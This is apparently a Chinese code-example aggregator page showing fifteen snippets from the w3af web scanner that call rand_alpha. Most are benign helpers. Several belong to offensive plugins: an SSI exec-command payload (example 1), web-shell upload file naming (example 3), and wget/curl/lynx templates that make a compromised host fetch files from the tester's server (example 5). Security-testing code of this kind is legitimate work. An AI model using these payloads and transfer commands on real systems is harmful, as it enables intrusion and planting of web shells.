本文整理汇总了Python中w3af.core.data.fuzzer.utils.rand_alpha函数的典型用法代码示例。如果您正苦于以下问题:Python rand_alpha函数的具体用法?Python rand_alpha怎么用?Python rand_alpha使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了rand_alpha函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: _get_ssi_strings
def _get_ssi_strings(self):
"""
This method returns a list of server sides to try to include.
:return: A string, see above.
"""
yield '<!--#exec cmd="echo -n %s;echo -n %s" -->' % (rand_alpha(5), rand_alpha(5))示例2: _get_table_prefix
def _get_table_prefix(self, table_prefix):
if table_prefix is None:
table_prefix = 'cached_disk_dict_%s' % rand_alpha(16)
else:
args = (table_prefix, rand_alpha(16))
table_prefix = 'cached_disk_dict_%s_%s' % args
return table_prefix示例3: _get_web_shells
def _get_web_shells(self, extension):
"""
:yield: Tuples with file_content and file_name for web shells.
"""
for shell_str, orig_extension in shell_handler.get_webshells(extension):
# If the webshell was webshell.php this will return a file_name
# containing kgiwjxh.php (8 rand and the extension)
file_name = '%s.%s' % (rand_alpha(8), orig_extension)
yield shell_str, file_name
# Now we want to return the webshell content <?php ... ?> but in a
# file with the extension that the upload URL had. This makes our
# chances of getting access a little greater
file_name = '%s.%s' % (rand_alpha(8), extension)
yield shell_str, file_name示例4: audit
def audit(self, freq, orig_response):
"""
Searches for file upload vulns using a POST to author.dll.
:param freq: A FuzzableRequest
"""
domain_path = freq.get_url().get_domain_path()
if kb.kb.get(self, 'frontpage'):
# Nothing to do, I have found vuln(s) and I should stop on first
msg = 'Not verifying if I can upload files to: "%s" using'\
' author.dll. Because I already found a vulnerability.'
om.out.debug(msg)
return
# I haven't found any vulns yet, OR i'm trying to find every
# directory where I can write a file.
if domain_path not in self._already_tested:
self._already_tested.add(domain_path)
# Find a file that doesn't exist and then try to upload it
for _ in xrange(3):
rand_file = rand_alpha(5) + '.html'
rand_path_file = domain_path.url_join(rand_file)
res = self._uri_opener.GET(rand_path_file)
if is_404(res):
upload_id = self._upload_file(domain_path, rand_file)
self._verify_upload(domain_path, rand_file, upload_id)
break
else:
msg = 'frontpage plugin failed to find a 404 page. This is'\
' mostly because of an error in 404 page detection.'
om.out.error(msg)示例5: transfer
def transfer(self, data_str, destination):
"""
This method is used to transfer the data_str from w3af to the compromised server.
"""
if not self._command:
self.can_transfer()
commandTemplates = {}
commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s'
commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s'
commandTemplates['curl'] = 'curl http://%s:%s/%s > %s'
# Create the file
filename = rand_alpha(10)
file_path = get_temp_dir() + os.path.sep + filename
f = file(file_path, 'w')
f.write(data_str)
f.close()
# Start a web server on the inbound port and create the file that
# will be fetched by the compromised host
webserver.start_webserver(cf.cf.get('local_ip_address'),
self._inbound_port,
get_temp_dir())
commandToRun = commandTemplates[self._command] % \
(cf.cf.get('local_ip_address'), self._inbound_port,
filename, destination)
self._exec_method(commandToRun)
os.remove(file_path)
return self.verify_upload(data_str, destination)示例6: __init__
def __init__(self, table_prefix=None, dump=None, load=None):
"""
:param table_prefix: The DBMS table prefix, mostly for debugging.
:param dump: The function to use to serialize the object
:param load: The function to use to deserialize the object
"""
self.db = get_default_temp_db_instance()
prefix = '' if table_prefix is None else ('%s_' % table_prefix)
self.table_name = 'disk_list_' + prefix + rand_alpha(30)
self.dump = dump
self.load = load
# Create table
# DO NOT add the AUTOINCREMENT flag to the table creation since that
# will break __getitem__ when an item is removed, see:
# http://www.sqlite.org/faq.html#q1
columns = [('index_', 'INTEGER'),
('eq_attrs', 'TEXT'),
('pickle', 'BLOB')]
pks = ['index_']
self.db.create_table(self.table_name, columns, pks)
self.db.create_index(self.table_name, ['eq_attrs'])
self.db.commit()
self._state = OPEN示例7: setup
def setup(self):
"""
Setup all the required backend stores. This was mostly created to avoid
starting any threads during __init__() which is called during python's
import phase and dead-locks in some cases.
:return: None
"""
with self._kb_lock:
if self.initialized:
return
self.urls = DiskSet(table_prefix='kb_urls')
self.fuzzable_requests = DiskSet(table_prefix='kb_fuzzable_requests')
self.db = get_default_persistent_db_instance()
self.table_name = 'knowledge_base_' + rand_alpha(30)
self.db.create_table(self.table_name, self.COLUMNS)
self.db.create_index(self.table_name, ['location_a', 'location_b'])
self.db.create_index(self.table_name, ['uniq_id'])
self.db.commit()
# Only initialize once
self.initialized = True示例8: create_mutants
def create_mutants(freq, mutant_str_list, fuzzable_param_list,
append, fuzzer_config):
"""
This is a very important method which is called in order to create
mutants. Usually called from fuzzer.py module.
"""
if not 'fuzz_form_files' in fuzzer_config:
return []
if not isinstance(freq, HTTPPostDataRequest):
return []
file_vars = freq.get_file_vars()
if not file_vars:
return []
fake_file_objs = []
ext = fuzzer_config['fuzzed_files_extension']
for mutant_str in mutant_str_list:
if isinstance(mutant_str, basestring):
# I have to create the NamedStringIO with a "name".
# This is needed for MultipartPostHandler
fname = "%s.%s" % (rand_alpha(7), ext)
str_file = NamedStringIO(mutant_str, name=fname)
fake_file_objs.append(str_file)
res = Mutant._create_mutants_worker(freq, FileContentMutant,
fake_file_objs,
file_vars,
append, fuzzer_config)
return res示例9: audit
def audit(self, freq, orig_response, debugging_id):
"""
Searches for file upload vulns using a POST to author.dll.
:param freq: A FuzzableRequest
:param orig_response: The HTTP response associated with the fuzzable request
:param debugging_id: A unique identifier for this call to audit()
"""
# Only run if we have the author URL for this frontpage instance
if self._get_author_url() is None:
return
# Only identify one vulnerability of this type
if kb.kb.get(self, 'frontpage'):
return
domain_path = freq.get_url().get_domain_path()
# Upload only once to each directory
if domain_path in self._already_tested:
return
self._already_tested.add(domain_path)
rand_file = rand_alpha(6) + '.html'
upload_id = self._upload_file(domain_path, rand_file, debugging_id)
self._verify_upload(domain_path, rand_file, upload_id, debugging_id)示例10: _PUT
def _PUT(self, domain_path):
"""
Tests PUT method.
"""
# upload
url = domain_path.url_join(rand_alpha(5))
rnd_content = rand_alnum(6)
headers = Headers([('content-type', 'text/plain')])
put_response = self._uri_opener.PUT(url, data=rnd_content,
headers=headers)
# check if uploaded
res = self._uri_opener.GET(url, cache=True)
if res.get_body() == rnd_content:
msg = 'File upload with HTTP PUT method was found at resource:' \
' "%s". A test file was uploaded to: "%s".'
msg = msg % (domain_path, res.get_url())
v = Vuln('Insecure DAV configuration', msg, severity.HIGH,
[put_response.id, res.id], self.get_name())
v.set_url(url)
v.set_method('PUT')
self.kb_append(self, 'dav', v)
# Report some common errors
elif put_response.get_code() == 500:
msg = 'DAV seems to be incorrectly configured. The web server' \
' answered with a 500 error code. In most cases, this means'\
' that the DAV extension failed in some way. This error was'\
' found at: "%s".' % put_response.get_url()
i = Info('DAV incorrect configuration', msg, res.id, self.get_name())
i.set_url(url)
i.set_method('PUT')
self.kb_append(self, 'dav', i)
# Report some common errors
elif put_response.get_code() == 403:
msg = 'DAV seems to be correctly configured and allowing you to'\
' use the PUT method but the directory does not have the'\
' correct permissions that would allow the web server to'\
' write to it. This error was found at: "%s".'
msg = msg % put_response.get_url()
i = Info('DAV incorrect configuration', msg,
[put_response.id, res.id], self.get_name())
i.set_url(url)
i.set_method('PUT')
self.kb_append(self, 'dav', i)示例11: can_exploit
def can_exploit(self, opener):
rand = rand_alpha(8)
cmd = self.generate_command('echo %s|rev' % rand)
# For some reason that I don't care about, rev adds a \n to the string
# it reverses, even when I run the echo with "-n".
expected_output = '%s\n' % rand[::-1]
http_response = self.send(cmd, opener)
return expected_output == self.extract_result(http_response)示例12: get_file_from_template
def get_file_from_template(extension):
file_name = "%s.%s" % (rand_alpha(7), extension)
template_file = os.path.join(TEMPLATE_DIR, 'template.%s' % extension)
if os.path.exists(template_file):
file_content = file(template_file).read()
success = True
else:
file_content = rand_alnum(64)
success = False
return success, file_content, file_name示例13: __init__
def __init__(self):
AuditPlugin.__init__(self)
# Create some random strings, which the plugin will use.
# for the fuzz_with_echo
self._rnd = rand_alpha(5)
self._rnd = self._rnd.lower()
self._expected_result = self._rnd * self.PRINT_REPEATS
# User configured parameters
self._use_time_delay = True
self._use_echo = True示例14: _fingerprint_SecureIIS
def _fingerprint_SecureIIS(self, fuzzable_request):
"""
Try to verify if SecureIIS is installed or not.
"""
# And now a final check for SecureIIS
headers = fuzzable_request.get_headers()
headers['Transfer-Encoding'] = rand_alpha(1024 + 1)
try:
lock_response2 = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers, cache=True)
except BaseFrameworkException, w3:
om.out.debug(
'Failed to identify secure IIS, exception: ' + str(w3))示例15: _fingerprint_URLScan
def _fingerprint_URLScan(self, fuzzable_request):
"""
Try to verify if URLScan is installed or not.
"""
# detect using GET
# Get the original response
orig_response = self._uri_opener.GET(
fuzzable_request.get_url(), cache=True)
if orig_response.get_code() != 404:
# Now add the if header and try again
headers = fuzzable_request.get_headers()
headers['If'] = rand_alpha(8)
if_response = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Translate'] = rand_alpha(8)
translate_response = self._uri_opener.GET(
fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Lock-Token'] = rand_alpha(8)
lock_response = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Transfer-Encoding'] = rand_alpha(8)
transfer_enc_response = self._uri_opener.GET(
fuzzable_request.get_url(),
headers=headers,
cache=True)
if if_response.get_code() == 404 or translate_response.get_code() == 404 or\
lock_response.get_code() == 404 or transfer_enc_response.get_code() == 404:
self._report_finding('URLScan', lock_response)